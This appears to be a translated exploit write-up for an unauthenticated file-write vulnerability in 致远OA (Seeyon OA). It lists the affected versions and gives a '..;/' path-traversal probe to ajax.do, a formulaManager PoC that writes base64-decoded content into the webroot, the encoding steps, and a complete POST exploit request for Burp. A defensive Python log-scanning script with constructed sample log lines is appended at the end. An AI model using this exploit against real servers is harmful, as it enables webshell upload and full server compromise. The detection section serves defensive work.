Affected versions:

致远OA V8.0
致远OA V7.1, V7.1SP1
致远OA V7.0, V7.0SP1, V7.0SP2, V7.0SP3
致远OA V6.0, V6.1SP1, V6.1SP2
致远OA V5.x
致远OA G6

Set up your own test environment first.


Retest procedure

Verify whether the vulnerable file exists

http://192.168.1.18:8080/seeyon/autoinstall.do/..;/ajax.do


If the response shows "出现异常:java.lang.NullPointerException:null", the vulnerable component is present and the target may be vulnerable.

Exploit the vulnerability with the PoC

[{'formulaType': 1, 'formulaName': 'test', 'formulaExpression': 'String path = "../webapps/seeyon/";
        java.io.PrintWriter printWriter2 = new java.io.PrintWriter(path+"文件名.txt");
        String shell = "需要上传的内容base64编码放入此处";
        sun.misc.BASE64Decoder decoder = new sun.misc.BASE64Decoder();
        String decodeString = new String(decoder.decodeBuffer(shell),"UTF-8");
        printWriter2.println(decodeString);
        printWriter2.close();};test();def static xxx(){'}, '', {}, 'true']

After editing the PoC above, gzip-compress it and then URL-encode the result to obtain the exploit payload.

Encoding and exploitation process

Base64-encode the content to be uploaded


Replace the String shell value in the PoC and change the upload file name


Apply gzip compression and URL encoding
Online encoding tool: https://ailiqun.xyz/%E5%9C%A8%E7%BA%BF%E5%8A%A0%E8%A7%A3%E5%AF%86%E5%B7%A5%E5%85%B7/


The final exploit request is:
POST /seeyon/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress=gzip HTTP/1.1
Host: 127.0.0.1
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
loginPageURL=; login_locale=zh_CN;
Content-Type: application/x-www-form-urlencoded

managerMethod=validate&arguments=<gzip-compressed and URL-encoded PoC content>
Send the request with Burp to exploit the vulnerability.


Exploitation succeeded

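From the defender's side, the distinguishing trait of both the probe and the exploit request above is the `..;/` segment that the servlet container collapses so that `autoinstall.do/..;/ajax.do` resolves to `/seeyon/ajax.do`. The following detection script is an added example, not part of the original write-up or of the 致远OA product: it normalises request paths the way the container does, flags log lines that reach `ajax.do` through that bypass, and raises the severity when `managerName=formulaManager` is present. The log lines are constructed samples in common log format.

```python
import re
from urllib.parse import unquote, urlsplit, parse_qs

# Constructed sample access-log lines (common log format); not real traffic.
SAMPLE_LOG = """\
192.0.2.10 - - [10/Oct/2023:12:00:00 +0800] "POST /seeyon/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress=gzip HTTP/1.1" 200 512
192.0.2.11 - - [10/Oct/2023:12:00:01 +0800] "GET /seeyon/autoinstall.do/..;/ajax.do HTTP/1.1" 500 88
192.0.2.12 - - [10/Oct/2023:12:00:02 +0800] "GET /seeyon/main.do HTTP/1.1" 200 1024
192.0.2.13 - - [10/Oct/2023:12:00:03 +0800] "POST /seeyon/ajax.do?method=ajaxAction&managerName=portalCssManager HTTP/1.1" 200 300
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})')

def servlet_path(raw_path: str) -> str:
    # Resolve the path as the servlet container does: percent-decode, drop the
    # ';...' path parameter from each segment (so '..;' becomes '..'), then
    # collapse '.' and '..'. /seeyon/autoinstall.do/..;/ajax.do -> /seeyon/ajax.do
    out = []
    for seg in unquote(raw_path).split("/"):
        seg = seg.split(";", 1)[0]
        if seg in ("", "."):
            continue
        if seg == "..":
            if out:
                out.pop()
            continue
        out.append(seg)
    return "/" + "/".join(out)

def classify(line: str):
    # Finding dict for a line that reaches ajax.do via a ';' traversal, else None.
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    raw_path = parts.path
    bypass = ";" in raw_path and ".." in unquote(raw_path)
    if not bypass or servlet_path(raw_path) != "/seeyon/ajax.do":
        return None
    manager = parse_qs(parts.query).get("managerName", [""])[0]
    # formulaManager is the handler the write-up's payload targets; a bare hit
    # on ajax.do through the bypass matches the NullPointerException probe.
    severity = "high" if manager == "formulaManager" else "medium"
    return {"ip": m.group("ip"), "severity": severity, "manager": manager,
            "status": m.group("status"), "raw_path": raw_path}

def scan(log_text: str):
    return [f for f in map(classify, log_text.splitlines()) if f]
```

Running `scan(SAMPLE_LOG)` returns two findings: the exploit request from 192.0.2.10 as high and the probe from 192.0.2.11 as medium, while direct, non-bypass hits on `ajax.do` are not flagged.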